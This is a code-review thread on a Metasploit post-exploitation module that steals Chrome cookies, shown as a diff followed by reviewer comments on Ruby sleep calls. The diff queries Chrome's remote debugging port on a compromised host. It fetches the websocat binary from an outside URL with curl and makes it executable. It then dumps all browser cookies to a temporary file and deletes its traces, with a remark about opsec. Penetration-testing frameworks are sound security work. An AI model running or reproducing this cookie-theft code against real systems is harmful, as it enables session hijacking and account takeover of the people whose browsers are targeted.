modules/post/chrome/gather/cookies.rb

```diff
@@ -0,0 +1,176 @@
+
+    # Sleep so the Chrome process has time to start and open
+    # the tab before we query the remote debugging port.
+    # You may need a longer sleep time on a slower machine.
+    sleep 2.seconds
+  end
+
+  def get_websocket_url
+    response = cmd_exec("curl -s http://localhost:#{datastore['REMOTE_DEBUGGING_PORT']}/json")
+    websocket_url = JSON.parse(response)[0]['webSocketDebuggerUrl']
+    vprint_status("Found webSocketDebuggerUrl #{websocket_url}")
+    websocket_url
+  end
+
+  def download_websocat
+    if Pathname.new(@websocat_storage_path).exist?
+      print_status "websocat binary already exists at #{@websocat_storage_path}, skipping download"
+      return
+    end
+
+    url = WEBSOCAT_URL + @websocat_url_suffix
+    print_warning "Writing websocat binary to #{@websocat_storage_path} temporarily"
+    print_status "Downloading #{url} to #{@websocat_storage_path}"
+    cmd_exec "curl -L #{url} > #{@websocat_storage_path}"
+    cmd_exec "chmod +x #{@websocat_storage_path}"
+    vprint_status 'Download complete'
+
+    # Sleep here because there's sometimes a race condition ("file busy") between the binary being downloaded and executed.
+    sleep 5.seconds
+  end
+
+  def cleanup_websocat
+    cmd_exec "rm #{@websocat_storage_path}"
+    print_status "Deleted #{@websocat_storage_path}"
+    cmd_exec "rm #{@cookie_storage_path}"
+    print_status "Deleted #{@cookie_storage_path}"
+  end
+
+  def get_cookies(ws_url)
+
+    download_websocat
+
+    begin
+      # Redirect to a file because websocat streams the data, and can't send cookies larger than 65535 bytes in one message.
+      # This breaks cmd_exec, which cuts off the data partway. We're already writing to disk anyway, so I sure hope this is a good enough opsec tradeoff.
+      print_warning "Writing cookies to #{@cookie_storage_path} temporarily"
+      cmd = "echo '#{GET_ALL_COOKIES_REQUEST}' | #{@websocat_storage_path} -q #{ws_url} > #{@cookie_storage_path}"
+      errors = cmd_exec cmd
+
+      unless errors.empty?
+        print_bad "Error running #{cmd}"
+        print_error errors
+      end
+
+      cookies = File.read "#{@cookie_storage_path}"
+
+      # The websocket debugger URL is sometimes flaky, for whatever reason, so
+      # retry a few times.
+      if cookies.empty?
+        raise "No data read from websocket debugger url #{ws_url}"
+      end
+
+      # The cookies might be split into more than one message, delimited by '\n'. Remove them if so.
+      cookies = cookies.delete "\n"
+
+      result = JSON.parse cookies
+      cookies = result['result']['cookies']
+      print_good "Read #{cookies.length} cookies from #{ws_url}"
+    rescue RuntimeError
+      raise "Could not read any data from websocket debugger url #{ws_url}" if @retries.zero?
+
+      print_bad "No data read from websocket debugger url #{ws_url}. Retrying... (Retries left: #{@retries -= 1})"
+      sleep 5.seconds
```

Comment:
Does this work?

```
2.3.0 :001 > sleep 5.seconds
NoMethodError: undefined method `seconds' for 5:Fixnum
Did you mean?  send
	from (irb):1
	from /usr/local/rvm/rubies/ruby-2.3.0/bin/irb:11:in `<main>'
```

Also `Rex.sleep` is preferred.

```suggestion
      Rex.sleep 5
```

Reply:
It worked in my testing, but again I was sleeping in the wrong place. These sleeps probably aren't necessary any more since, as you pointed out, they were being executed on the msf host.

Reply:
Sleeping on the msf host is fine, as it delays the module execution, giving the target some time to do whatever it has to do before the module shoves more commands down the channel.